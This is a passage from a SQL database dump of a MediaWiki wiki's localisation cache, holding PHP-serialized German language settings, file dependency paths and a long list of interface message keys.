s:19:\"vector-view-history\";i:100;s:16:\"vector-view-view\";i:101;s:9:\"viewcount\";i:102;s:5:\"views\";i:103;s:13:\"whatlinkshere\";}'),('de','namespaceGenderAliases','a:2:{i:2;a:2:{s:4:\"male\";s:8:\"Benutzer\";s:6:\"female\";s:10:\"Benutzerin\";}i:3;a:2:{s:4:\"male\";s:19:\"Benutzer_Diskussion\";s:6:\"female\";s:21:\"Benutzerin_Diskussion\";}}'),('de','digitGroupingPattern','N;'),('de','pluralRules','a:1:{i:0;s:26:\"i = 1 and v = 0 @integer 1\";}'),('de','pluralRuleTypes','a:1:{i:0;s:3:\"one\";}'),('de','compiledPluralRules','a:1:{i:0;s:17:\"i 1 in v 0 in and\";}'),('de','fallbackSequence','a:1:{i:0;s:2:\"en\";}'),('de','deps','a:21:{i:0;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:65:\"/var/www/sites/wuppertalwiki.de/languages/messages/MessagesDe.php\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}s:7:\"plurals\";O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:58:\"/var/www/sites/wuppertalwiki.de/languages/data/plurals.xml\";s:25:\"\0FileDependency\0timestamp\";i:1427827534;}s:10:\"plurals-mw\";O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:68:\"/var/www/sites/wuppertalwiki.de/languages/data/plurals-mediawiki.xml\";s:25:\"\0FileDependency\0timestamp\";i:1427827534;}i:1;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:54:\"/var/www/sites/wuppertalwiki.de/languages/i18n/de.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}i:2;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:66:\"/var/www/sites/wuppertalwiki.de/resources/lib/oojs-ui/i18n/de.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}i:3;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:62:\"/var/www/sites/wuppertalwiki.de/skins/CologneBlue/i18n/de.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:4;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:57:\"/var/www/sites/wuppertalwiki.de/skins/Modern/i18n/de.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:5;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:59:\"/var/www/sites/wuppertalwiki.de/skins/MonoBook/i18n/de.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:6;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:57:\"/var/www/sites/wuppertalwiki.de/skins/Vector/i18n/de.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:7;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:66:\"/var/www/sites/wuppertalwiki.de/extensions/WikiEditor/i18n/de.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827537;}i:8;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:54:\"/var/www/sites/wuppertalwiki.de/languages/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}i:9;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:66:\"/var/www/sites/wuppertalwiki.de/resources/lib/oojs-ui/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}i:10;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:62:\"/var/www/sites/wuppertalwiki.de/skins/CologneBlue/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:11;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:57:\"/var/www/sites/wuppertalwiki.de/skins/Modern/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:12;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:59:\"/var/www/sites/wuppertalwiki.de/skins/MonoBook/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:13;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:57:\"/var/www/sites/wuppertalwiki.de/skins/Vector/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827538;}i:14;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:66:\"/var/www/sites/wuppertalwiki.de/extensions/WikiEditor/i18n/en.json\";s:25:\"\0FileDependency\0timestamp\";i:1427827537;}i:15;O:14:\"FileDependency\":2:{s:24:\"\0FileDependency\0filename\";s:65:\"/var/www/sites/wuppertalwiki.de/languages/messages/MessagesEn.php\";s:25:\"\0FileDependency\0timestamp\";i:1427827535;}s:24:\"wgExtensionMessagesFiles\";O:16:\"GlobalDependency\":2:{s:22:\"\0GlobalDependency\0name\";s:24:\"wgExtensionMessagesFiles\";s:23:\"\0GlobalDependency\0value\";a:1:{s:10:\"WikiEditor\";s:73:\"/var/www/sites/wuppertalwiki.de/extensions/WikiEditor/WikiEditor.i18n.php\";}}s:14:\"wgMessagesDirs\";O:16:\"GlobalDependency\":2:{s:22:\"\0GlobalDependency\0name\";s:14:\"wgMessagesDirs\";s:23:\"\0GlobalDependency\0value\";a:7:{s:4:\"core\";s:46:\"/var/www/sites/wuppertalwiki.de/languages/i18n\";s:7:\"oojs-ui\";s:58:\"/var/www/sites/wuppertalwiki.de/resources/lib/oojs-ui/i18n\";s:11:\"CologneBlue\";s:54:\"/var/www/sites/wuppertalwiki.de/skins/CologneBlue/i18n\";s:6:\"Modern\";s:49:\"/var/www/sites/wuppertalwiki.de/skins/Modern/i18n\";s:8:\"MonoBook\";s:51:\"/var/www/sites/wuppertalwiki.de/skins/MonoBook/i18n\";s:6:\"Vector\";s:49:\"/var/www/sites/wuppertalwiki.de/skins/Vector/i18n\";s:10:\"WikiEditor\";s:58:\"/var/www/sites/wuppertalwiki.de/extensions/WikiEditor/i18n\";}}s:7:\"version\";O:18:\"ConstantDependency\":2:{s:24:\"\0ConstantDependency\0name\";s:26:\"LocalisationCache::VERSION\";s:25:\"\0ConstantDependency\0value\";i:2;}}'); INSERT INTO `l10n_cache` VALUES ('de','list','a:1:{s:8:\"messages\";a:3838:{i:0;s:13:\"tog-underline\";i:1;s:13:\"tog-hideminor\";i:2;s:17:\"tog-hidepatrolled\";i:3;s:25:\"tog-newpageshidepatrolled\";i:4;s:19:\"tog-extendwatchlist\";i:5;s:12:\"tog-usenewrc\";i:6;s:18:\"tog-numberheadings\";i:7;s:15:\"tog-showtoolbar\";i:8;s:18:\"tog-editondblclick\";i:9;s:27:\"tog-editsectiononrightclick\";i:10;s:18:\"tog-watchcreations\";i:11;s:16:\"tog-watchdefault\";i:12;s:14:\"tog-watchmoves\";i:13;s:17:\"tog-watchdeletion\";i:14;s:17:\"tog-watchrollback\";i:15;s:16:\"tog-minordefault\";i:16;s:16:\"tog-previewontop\";i:17;s:18:\"tog-previewonfirst\";i:18;s:24:\"tog-enotifwatchlistpages\";i:19;s:23:\"tog-enotifusertalkpages\";i:20;s:20:\"tog-enotifminoredits\";i:21;s:20:\"tog-enotifrevealaddr\";i:22;s:23:\"tog-shownumberswatching\";i:23;s:10:\"tog-oldsig\";i:24;s:12:\"tog-fancysig\";i:25;s:18:\"tog-uselivepreview\";i:26;s:20:\"tog-forceeditsummary\";i:27;s:20:\"tog-watchlisthideown\";i:28;s:21:\"tog-watchlisthidebots\";i:29;s:22:\"tog-watchlisthideminor\";i:30;s:20:\"tog-watchlisthideliu\";i:31;s:22:\"tog-watchlisthideanons\";i:32;s:26:\"tog-watchlisthidepatrolled\";i:33;s:16:\"tog-ccmeonemails\";i:34;s:12:\"tog-diffonly\";i:35;s:18:\"tog-showhiddencats\";i:36;s:18:\"tog-norollbackdiff\";i:37;s:18:\"tog-useeditwarning\";i:38;s:16:\"tog-prefershttps\";i:39;s:16:\"underline-always\";i:40;s:15:\"underline-never\";i:41;s:17:\"underline-default\";i:42;s:14:\"editfont-style\";i:43;s:16:\"editfont-default\";i:44;s:18:\"editfont-monospace\";i:45;s:18:\"editfont-sansserif\";i:46;s:14:\"editfont-serif\";i:47;s:6:\"sunday\";i:48;s:6:\"monday\";i:49;s:7:\"tuesday\";i:50;s:9:\"wednesday\";i:51;s:8:\"thursday\";i:52;s:6:\"friday\";i:53;s:8:\"saturday\";i:54;s:3:\"sun\";i:55;s:3:\"mon\";i:56;s:3:\"tue\";i:57;s:3:\"wed\";i:58;s:3:\"thu\";i:59;s:3:\"fri\";i:60;s:3:\"sat\";i:61;s:7:\"january\";i:62;s:8:\"february\";i:63;s:5:\"march\";i:64;s:5:\"april\";i:65;s:8:\"may_long\";i:66;s:4:\"june\";i:67;s:4:\"july\";i:68;s:6:\"august\";i:69;s:9:\"september\";i:70;s:7:\"october\";i:71;s:8:\"november\";i:72;s:8:\"december\";i:73;s:11:\"january-gen\";i:74;s:12:\"february-gen\";i:75;s:9:\"march-gen\";i:76;s:9:\"april-gen\";i:77;s:7:\"may-gen\";i:78;s:8:\"june-gen\";i:79;s:8:\"july-gen\";i:80;s:10:\"august-gen\";i:81;s:13:\"september-gen\";i:82;s:11:\"october-gen\";i:83;s:12:\"november-gen\";i:84;s:12:\"december-gen\";i:85;s:3:\"jan\";i:86;s:3:\"feb\";i:87;s:3:\"mar\";i:88;s:3:\"apr\";i:89;s:3:\"may\";i:90;s:3:\"jun\";i:91;s:3:\"jul\";i:92;s:3:\"aug\";i:93;s:3:\"sep\";i:94;s:3:\"oct\";i:95;s:3:\"nov\";i:96;s:3:\"dec\";i:97;s:12:\"january-date\";i:98;s:13:\"february-date\";i:99;s:10:\"march-date\";i:100;s:10:\"april-date\";i:101;s:8:\"may-date\";i:102;s:9:\"june-date\";i:103;s:9:\"july-date\";i:104;s:11:\"august-date\";i:105;s:14:\"september-date\";i:106;s:12:\"october-date\";i:107;s:13:\"november-date\";i:108;s:13:\"december-date\";i:109;s:14:\"pagecategories\";i:110;s:15:\"category_header\";i:111;s:13:\"subcategories\";i:112;s:21:\"category-media-header\";i:113;s:14:\"category-empty\";i:114;s:17:\"hidden-categories\";i:115;s:24:\"hidden-category-category\";i:116;s:21:\"category-subcat-count\";i:117;s:29:\"category-subcat-count-limited\";i:118;s:22:\"category-article-count\";i:119;s:30:\"category-article-count-limited\";i:120;s:19:\"category-file-count\";i:121;s:27:\"category-file-count-limited\";i:122;s:22:\"listingcontinuesabbrev\";i:123;s:14:\"index-category\";i:124;s:16:\"noindex-category\";i:125;s:20:\"broken-file-category\";i:126;s:5:\"about\";i:127;s:7:\"article\";i:128;s:9:\"newwindow\";i:129;s:6:\"cancel\";i:130;s:13:\"moredotdotdot\";i:131;s:13:\"morenotlisted\";i:132;s:6:\"mypage\";i:133;s:6:\"mytalk\";i:134;s:8:\"anontalk\";i:135;s:10:\"navigation\";i:136;s:3:\"and\";i:137;s:6:\"qbfind\";i:138;s:8:\"qbbrowse\";i:139;s:6:\"qbedit\";i:140;s:13:\"qbpageoptions\";i:141;s:11:\"qbmyoptions\";i:142;s:3:\"faq\";i:143;s:7:\"faqpage\";i:144;s:7:\"actions\";i:145;s:10:\"namespaces\";i:146;s:8:\"variants\";i:147;s:18:\"navigation-heading\";i:148;s:14:\"errorpagetitle\";i:149;s:8:\"returnto\";i:150;s:7:\"tagline\";i:151;s:4:\"help\";i:152;s:6:\"search\";i:153;s:12:\"searchbutton\";i:154;s:2:\"go\";i:155;s:13:\"searcharticle\";i:156;s:7:\"history\";i:157;s:13:\"history_short\";i:158;s:13:\"updatedmarker\";i:159;s:16:\"printableversion\";i:160;s:9:\"permalink\";i:161;s:5:\"print\";i:162;s:4:\"view\";i:163;s:12:\"view-foreign\";i:164;s:4:\"edit\";i:165;s:10:\"edit-local\";i:166;s:6:\"create\";i:167;s:12:\"create-local\";i:168;s:12:\"editthispage\";i:169;s:16:\"create-this-page\";i:170;s:6:\"delete\";i:171;s:14:\"deletethispage\";i:172;s:16:\"undeletethispage\";i:173;s:14:\"undelete_short\";i:174;s:17:\"viewdeleted_short\";i:175;s:7:\"protect\";i:176;s:14:\"protect_change\";i:177;s:15:\"protectthispage\";i:178;s:9:\"unprotect\";i:179;s:17:\"unprotectthispage\";i:180;s:7:\"newpage\";i:181;s:8:\"talkpage\";i:182;s:16:\"talkpagelinktext\";i:183;s:11:\"specialpage\";i:184;s:13:\"personaltools\";i:185;s:11:\"articlepage\";i:186;s:4:\"talk\";i:187;s:5:\"views\";i:188;s:7:\"toolbox\";i:189;s:8:\"userpage\";i:190;s:11:\"projectpage\";i:191;s:9:\"imagepage\";i:192;s:13:\"mediawikipage\";i:193;s:12:\"templatepage\";i:194;s:12:\"viewhelppage\";i:195;s:12:\"categorypage\";i:196;s:12:\"viewtalkpage\";i:197;s:14:\"otherlanguages\";i:198;s:14:\"redirectedfrom\";i:199;s:15:\"redirectpagesub\";i:200;s:10:\"redirectto\";i:201;s:14:\"lastmodifiedat\";i:202;s:9:\"viewcount\";i:203;s:13:\"protectedpage\";i:204;s:6:\"jumpto\";i:205;s:16:\"jumptonavigation\";i:206;s:12:\"jumptosearch\";i:207;s:15:\"view-pool-error\";i:208;s:18:\"generic-pool-error\";i:209;s:12:\"pool-timeout\";i:210;s:14:\"pool-queuefull\";i:211;s:17:\"pool-errorunknown\";i:212;s:16:\"pool-servererror\";i:213;s:9:\"aboutsite\";i:214;s:9:\"aboutpage\";i:215;s:9:\"copyright\";i:216;s:13:\"copyrightpage\";i:217;s:13:\"currentevents\";i:218;s:17:\"currentevents-url\";i:219;s:11:\"disclaimers\";i:220;s:14:\"disclaimerpage\";i:221;s:8:\"edithelp\";i:222;s:8:\"mainpage\";i:223;s:20:\"mainpage-description\";i:224;s:10:\"policy-url\";i:225;s:6:\"portal\";i:226;s:10:\"portal-url\";i:227;s:7:\"privacy\";i:228;s:11:\"privacypage\";i:229;s:9:\"badaccess\";i:230;s:16:\"badaccess-group0\";i:231;s:16:\"badaccess-groups\";i:232;s:15:\"versionrequired\";i:233;s:19:\"versionrequiredtext\";i:234;s:2:\"ok\";i:235;s:9:\"pagetitle\";i:236;s:13:\"retrievedfrom\";i:237;s:18:\"youhavenewmessages\";i:238;s:27:\"youhavenewmessagesfromusers\";i:239;s:27:\"youhavenewmessagesmanyusers\";i:240;s:21:\"newmessageslinkplural\";i:241;s:25:\"newmessagesdifflinkplural\";i:242;s:23:\"youhavenewmessagesmulti\";i:243;s:11:\"editsection\";i:244;s:7:\"editold\";i:245;s:13:\"viewsourceold\";i:246;s:8:\"editlink\";i:247;s:14:\"viewsourcelink\";i:248;s:15:\"editsectionhint\";i:249;s:3:\"toc\";i:250;s:7:\"showtoc\";i:251;s:7:\"hidetoc\";i:252;s:20:\"collapsible-collapse\";i:253;s:18:\"collapsible-expand\";i:254;s:19:\"confirmable-confirm\";i:255;s:15:\"confirmable-yes\";i:256;s:14:\"confirmable-no\";i:257;s:13:\"thisisdeleted\";i:258;s:11:\"viewdeleted\";i:259;s:11:\"restorelink\";i:260;s:9:\"feedlinks\";i:261;s:12:\"feed-invalid\";i:262;s:16:\"feed-unavailable\";i:263;s:13:\"site-rss-feed\";i:264;s:14:\"site-atom-feed\";i:265;s:13:\"page-rss-feed\";i:266;s:14:\"page-atom-feed\";i:267;s:14:\"red-link-title\";i:268;s:15:\"sort-descending\";i:269;s:14:\"sort-ascending\";i:270;s:10:\"nstab-main\";i:271;s:10:\"nstab-user\";i:272;s:11:\"nstab-media\";i:273;s:13:\"nstab-special\";i:274;s:13:\"nstab-project\";i:275;s:11:\"nstab-image\";i:276;s:15:\"nstab-mediawiki\";i:277;s:14:\"nstab-template\";i:278;s:10:\"nstab-help\";i:279;s:14:\"nstab-category\";i:280;s:12:\"nosuchaction\";i:281;s:16:\"nosuchactiontext\";i:282;s:17:\"nosuchspecialpage\";i:283;s:17:\"nospecialpagetext\";i:284;s:5:\"error\";i:285;s:13:\"databaseerror\";i:286;s:18:\"databaseerror-text\";i:287;s:20:\"databaseerror-textcl\";i:288;s:19:\"databaseerror-query\";i:289;s:22:\"databaseerror-function\";i:290;s:19:\"databaseerror-error\";i:291;s:15:\"laggedslavemode\";i:292;s:8:\"readonly\";i:293;s:15:\"enterlockreason\";i:294;s:12:\"readonlytext\";i:295;s:15:\"missing-article\";i:296;s:18:\"missingarticle-rev\";i:297;s:19:\"missingarticle-diff\";i:298;s:12:\"readonly_lag\";i:299;s:13:\"internalerror\";i:300;s:18:\"internalerror_info\";i:301;s:13:\"filecopyerror\";i:302;s:15:\"filerenameerror\";i:303;s:15:\"filedeleteerror\";i:304;s:20:\"directorycreateerror\";i:305;s:12:\"filenotfound\";i:306;s:10:\"unexpected\";i:307;s:9:\"formerror\";i:308;s:15:\"badarticleerror\";i:309;s:12:\"cannotdelete\";i:310;s:18:\"cannotdelete-title\";i:311;s:19:\"delete-hook-aborted\";i:312;s:16:\"no-null-revision\";i:313;s:8:\"badtitle\";i:314;s:12:\"badtitletext\";i:315;s:10:\"perfcached\";i:316;s:12:\"perfcachedts\";i:317;s:20:\"querypage-no-updates\";i:318;s:10:\"viewsource\";i:319;s:16:\"viewsource-title\";i:320;s:15:\"actionthrottled\";i:321;s:19:\"actionthrottledtext\";i:322;s:17:\"protectedpagetext\";i:323;s:14:\"viewsourcetext\";i:324;s:12:\"viewyourtext\";i:325;s:18:\"protectedinterface\";i:326;s:16:\"editinginterface\";i:327;s:16:\"cascadeprotected\";i:328;s:18:\"namespaceprotected\";i:329;s:18:\"customcssprotected\";i:330;s:17:\"customjsprotected\";i:331;s:20:\"mycustomcssprotected\";i:332;s:19:\"mycustomjsprotected\";i:333;s:22:\"myprivateinfoprotected\";i:334;s:22:\"mypreferencesprotected\";i:335;s:19:\"ns-specialprotected\";i:336;s:14:\"titleprotected\";i:337;s:17:\"filereadonlyerror\";i:338;s:27:\"invalidtitle-knownnamespace\";i:339;s:29:\"invalidtitle-unknownnamespace\";i:340;s:17:\"exception-nologin\";i:341;s:22:\"exception-nologin-text\";i:342;s:29:\"exception-nologin-text-manual\";i:343;s:16:\"virus-badscanner\";i:344;s:16:\"virus-scanfailed\";i:345;s:20:\"virus-unknownscanner\";i:346;s:10:\"logouttext\";i:347;s:11:\"welcomeuser\";i:348;s:19:\"welcomecreation-msg\";i:349;s:8:\"yourname\";i:350;s:18:\"userlogin-yourname\";i:351;s:21:\"userlogin-yourname-ph\";i:352;s:30:\"createacct-another-username-ph\";i:353;s:12:\"yourpassword\";i:354;s:22:\"userlogin-yourpassword\";i:355;s:25:\"userlogin-yourpassword-ph\";i:356;s:26:\"createacct-yourpassword-ph\";i:357;s:17:\"yourpasswordagain\";i:358;s:28:\"createacct-yourpasswordagain\";i:359;s:31:\"createacct-yourpasswordagain-ph\";i:360;s:18:\"remembermypassword\";i:361;s:28:\"userlogin-remembermypassword\";i:362;s:24:\"userlogin-signwithsecure\";i:363;s:14:\"yourdomainname\";i:364;s:25:\"password-change-forbidden\";i:365;s:15:\"externaldberror\";i:366;s:5:\"login\";i:367;s:23:\"nav-login-createaccount\";i:368;s:9:\"userlogin\";i:369;s:17:\"userloginnocreate\";i:370;s:6:\"logout\";i:371;s:10:\"userlogout\";i:372;s:11:\"notloggedin\";i:373;s:19:\"userlogin-noaccount\";i:374;s:21:\"userlogin-joinproject\";i:375;s:7:\"nologin\";i:376;s:11:\"nologinlink\";i:377;s:13:\"createaccount\";i:378;s:10:\"gotaccount\";i:379;s:14:\"gotaccountlink\";i:380;s:19:\"userlogin-resetlink\";i:381;s:28:\"userlogin-resetpassword-link\";i:382;s:19:\"userlogin-helplink2\";i:383;s:24:\"createacct-emailrequired\";i:384;s:24:\"createacct-emailoptional\";i:385;s:19:\"createacct-email-ph\";i:386;s:27:\"createacct-another-email-ph\";i:387;s:17:\"createaccountmail\";i:388;s:19:\"createacct-realname\";i:389;s:19:\"createaccountreason\";i:390;s:17:\"createacct-reason\";i:391;s:20:\"createacct-reason-ph\";i:392;s:18:\"createacct-captcha\";i:393;s:24:\"createacct-imgcaptcha-ph\";i:394;s:17:\"createacct-submit\";i:395;s:25:\"createacct-another-submit\";i:396;s:26:\"createacct-benefit-heading\";i:397;s:24:\"createacct-benefit-body1\";i:398;s:24:\"createacct-benefit-body2\";i:399;s:24:\"createacct-benefit-body3\";i:400;s:9:\"badretype\";i:401;s:10:\"userexists\";i:402;s:10:\"loginerror\";i:403;s:16:\"createacct-error\";i:404;s:18:\"createaccounterror\";i:405;s:12:\"nocookiesnew\";i:406;s:14:\"nocookieslogin\";i:407;s:15:\"nocookiesfornew\";i:408;s:6:\"noname\";i:409;s:17:\"loginsuccesstitle\";i:410;s:12:\"loginsuccess\";i:411;s:10:\"nosuchuser\";i:412;s:15:\"nosuchusershort\";i:413;s:15:\"nouserspecified\";i:414;s:17:\"login-userblocked\";i:415;s:13:\"wrongpassword\";i:416;s:18:\"wrongpasswordempty\";i:417;s:16:\"passwordtooshort\";i:418;s:19:\"password-name-match\";i:419;s:24:\"password-login-forbidden\";i:420;s:14:\"mailmypassword\";i:421;s:21:\"passwordremindertitle\";i:422;s:20:\"passwordremindertext\";i:423;s:7:\"noemail\";i:424;s:13:\"noemailcreate\";i:425;s:12:\"passwordsent\";i:426;s:20:\"blocked-mailpassword\";i:427;s:12:\"eauthentsent\";i:428;s:22:\"throttled-mailpassword\";i:429;s:9:\"mailerror\";i:430;s:26:\"acct_creation_throttle_hit\";i:431;s:18:\"emailauthenticated\";i:432;s:21:\"emailnotauthenticated\";i:433;s:12:\"noemailprefs\";i:434;s:16:\"emailconfirmlink\";i:435;s:19:\"invalidemailaddress\";i:436;s:17:\"cannotchangeemail\";i:437;s:13:\"emaildisabled\";i:438;s:14:\"accountcreated\";i:439;s:18:\"accountcreatedtext\";i:440;s:19:\"createaccount-title\";i:441;s:18:\"createaccount-text\";i:442;s:15:\"login-throttled\";i:443;s:19:\"login-abort-generic\";i:444;s:22:\"login-migrated-generic\";i:445;s:18:\"loginlanguagelabel\";i:446;s:21:\"suspicious-userlogout\";i:447;s:31:\"createacct-another-realname-tip\";i:448;s:8:\"pt-login\";i:449;s:15:\"pt-login-button\";i:450;s:16:\"pt-createaccount\";i:451;s:13:\"pt-userlogout\";i:452;s:22:\"php-mail-error-unknown\";i:453;s:17:\"user-mail-no-addy\";i:454;s:17:\"user-mail-no-body\";i:455;s:14:\"changepassword\";i:456;s:18:\"resetpass_announce\";i:457;s:14:\"resetpass_text\";i:458;s:16:\"resetpass_header\";i:459;s:11:\"oldpassword\";i:460;s:11:\"newpassword\";i:461;s:9:\"retypenew\";i:462;s:16:\"resetpass_submit\";i:463;s:22:\"changepassword-success\";i:464;s:24:\"changepassword-throttled\";i:465;s:19:\"resetpass_forbidden\";i:466;s:17:\"resetpass-no-info\";i:467;s:25:\"resetpass-submit-loggedin\";i:468;s:23:\"resetpass-submit-cancel\";i:469;s:23:\"resetpass-wrong-oldpass\";i:470;s:18:\"resetpass-recycled\";i:471;s:22:\"resetpass-temp-emailed\";i:472;s:23:\"resetpass-temp-password\";i:473;s:23:\"resetpass-abort-generic\";i:474;s:17:\"resetpass-expired\";i:475;s:22:\"resetpass-expired-soft\";i:476;s:23:\"resetpass-validity-soft\";i:477;s:13:\"passwordreset\";i:478;s:22:\"passwordreset-text-one\";i:479;s:23:\"passwordreset-text-many\";i:480;s:20:\"passwordreset-legend\";i:481;s:22:\"passwordreset-disabled\";i:482;s:27:\"passwordreset-emaildisabled\";i:483;s:22:\"passwordreset-username\";i:484;s:20:\"passwordreset-domain\";i:485;s:21:\"passwordreset-capture\";i:486;s:26:\"passwordreset-capture-help\";i:487;s:19:\"passwordreset-email\";i:488;s:24:\"passwordreset-emailtitle\";i:489;s:26:\"passwordreset-emailtext-ip\";i:490;s:28:\"passwordreset-emailtext-user\";i:491;s:26:\"passwordreset-emailelement\";i:492;s:23:\"passwordreset-emailsent\";i:493;s:31:\"passwordreset-emailsent-capture\";i:494;s:32:\"passwordreset-emailerror-capture\";i:495;s:11:\"changeemail\";i:496;s:16:\"changeemail-text\";i:497;s:19:\"changeemail-no-info\";i:498;s:20:\"changeemail-oldemail\";i:499;s:20:\"changeemail-newemail\";i:500;s:16:\"changeemail-none\";i:501;s:20:\"changeemail-password\";i:502;s:18:\"changeemail-submit\";i:503;s:21:\"changeemail-throttled\";i:504;s:11:\"resettokens\";i:505;s:16:\"resettokens-text\";i:506;s:21:\"resettokens-no-tokens\";i:507;s:18:\"resettokens-legend\";i:508;s:18:\"resettokens-tokens\";i:509;s:23:\"resettokens-token-label\";i:510;s:27:\"resettokens-watchlist-token\";i:511;s:16:\"resettokens-done\";i:512;s:23:\"resettokens-resetbutton\";i:513;s:11:\"bold_sample\";i:514;s:8:\"bold_tip\";i:515;s:13:\"italic_sample\";i:516;s:10:\"italic_tip\";i:517;s:11:\"link_sample\";i:518;s:8:\"link_tip\";i:519;s:14:\"extlink_sample\";i:520;s:11:\"extlink_tip\";i:521;s:15:\"headline_sample\";i:522;s:12:\"headline_tip\";i:523;s:13:\"nowiki_sample\";i:524;s:10:\"nowiki_tip\";i:525;s:12:\"image_sample\";i:526;s:9:\"image_tip\";i:527;s:12:\"media_sample\";i:528;s:9:\"media_tip\";i:529;s:7:\"sig_tip\";i:530;s:6:\"hr_tip\";i:531;s:7:\"summary\";i:532;s:7:\"subject\";i:533;s:9:\"minoredit\";i:534;s:9:\"watchthis\";i:535;s:11:\"savearticle\";i:536;s:7:\"preview\";i:537;s:11:\"showpreview\";i:538;s:8:\"showdiff\";i:539;s:12:\"blankarticle\";i:540;s:15:\"anoneditwarning\";i:541;s:18:\"anonpreviewwarning\";i:542;s:14:\"missingsummary\";i:543;s:18:\"missingcommenttext\";i:544;s:20:\"missingcommentheader\";i:545;s:15:\"summary-preview\";i:546;s:15:\"subject-preview\";i:547;s:12:\"blockedtitle\";i:548;s:11:\"blockedtext\";i:549;s:15:\"autoblockedtext\";i:550;s:15:\"blockednoreason\";i:551;s:17:\"whitelistedittext\";i:552;s:15:\"confirmedittext\";i:553;s:18:\"nosuchsectiontitle\";i:554;s:17:\"nosuchsectiontext\";i:555;s:13:\"loginreqtitle\";i:556;s:12:\"loginreqlink\";i:557;s:16:\"loginreqpagetext\";i:558;s:12:\"accmailtitle\";i:559;s:11:\"accmailtext\";i:560;s:10:\"newarticle\";i:561;s:14:\"newarticletext\";i:562;s:16:\"anontalkpagetext\";i:563;s:13:\"noarticletext\";i:564;s:26:\"noarticletext-nopermission\";i:565;s:16:\"missing-revision\";i:566;s:25:\"userpage-userdoesnotexist\";i:567;s:30:\"userpage-userdoesnotexist-view\";i:568;s:25:\"blocked-notice-logextract\";i:569;s:14:\"clearyourcache\";i:570;s:20:\"usercssyoucanpreview\";i:571;s:19:\"userjsyoucanpreview\";i:572;s:14:\"usercsspreview\";i:573;s:13:\"userjspreview\";i:574;s:14:\"sitecsspreview\";i:575;s:13:\"sitejspreview\";i:576;s:21:\"userinvalidcssjstitle\";i:577;s:7:\"updated\";i:578;s:4:\"note\";i:579;s:11:\"previewnote\";i:580;s:16:\"continue-editing\";i:581;s:15:\"previewconflict\";i:582;s:20:\"session_fail_preview\";i:583;s:25:\"session_fail_preview_html\";i:584;s:21:\"token_suffix_mismatch\";i:585;s:20:\"edit_form_incomplete\";i:586;s:7:\"editing\";i:587;s:8:\"creating\";i:588;s:14:\"editingsection\";i:589;s:14:\"editingcomment\";i:590;s:12:\"editconflict\";i:591;s:15:\"explainconflict\";i:592;s:8:\"yourtext\";i:593;s:13:\"storedversion\";i:594;s:17:\"nonunicodebrowser\";i:595;s:10:\"editingold\";i:596;s:8:\"yourdiff\";i:597;s:16:\"copyrightwarning\";i:598;s:17:\"copyrightwarning2\";i:599;s:13:\"longpageerror\";i:600;s:15:\"readonlywarning\";i:601;s:20:\"protectedpagewarning\";i:602;s:24:\"semiprotectedpagewarning\";i:603;s:23:\"cascadeprotectedwarning\";i:604;s:21:\"titleprotectedwarning\";i:605;s:13:\"templatesused\";i:606;s:20:\"templatesusedpreview\";i:607;s:20:\"templatesusedsection\";i:608;s:18:\"template-protected\";i:609;s:22:\"template-semiprotected\";i:610;s:16:\"hiddencategories\";i:611;s:9:\"edittools\";i:612;s:12:\"nocreatetext\";i:613;s:17:\"nocreate-loggedin\";i:614;s:29:\"sectioneditnotsupported-title\";i:615;s:28:\"sectioneditnotsupported-text\";i:616;s:17:\"permissionserrors\";i:617;s:21:\"permissionserrorstext\";i:618;s:32:\"permissionserrorstext-withaction\";i:619;s:26:\"recreate-moveddeleted-warn\";i:620;s:19:\"moveddeleted-notice\";i:621;s:11:\"log-fulllog\";i:622;s:17:\"edit-hook-aborted\";i:623;s:17:\"edit-gone-missing\";i:624;s:13:\"edit-conflict\";i:625;s:14:\"edit-no-change\";i:626;s:29:\"postedit-confirmation-created\";i:627;s:30:\"postedit-confirmation-restored\";i:628;s:27:\"postedit-confirmation-saved\";i:629;s:19:\"edit-already-exists\";i:630;s:18:\"defaultmessagetext\";i:631;s:23:\"content-failed-to-parse\";i:632;s:20:\"invalid-content-data\";i:633;s:24:\"content-not-allowed-here\";i:634;s:19:\"editwarning-warning\";i:635;s:40:\"editpage-notsupportedcontentformat-title\";i:636;s:39:\"editpage-notsupportedcontentformat-text\";i:637;s:22:\"content-model-wikitext\";i:638;s:18:\"content-model-text\";i:639;s:24:\"content-model-javascript\";i:640;s:17:\"content-model-css\";i:641;s:32:\"expensive-parserfunction-warning\";i:642;s:33:\"expensive-parserfunction-category\";i:643;s:38:\"post-expand-template-inclusion-warning\";i:644;s:39:\"post-expand-template-inclusion-category\";i:645;s:37:\"post-expand-template-argument-warning\";i:646;s:38:\"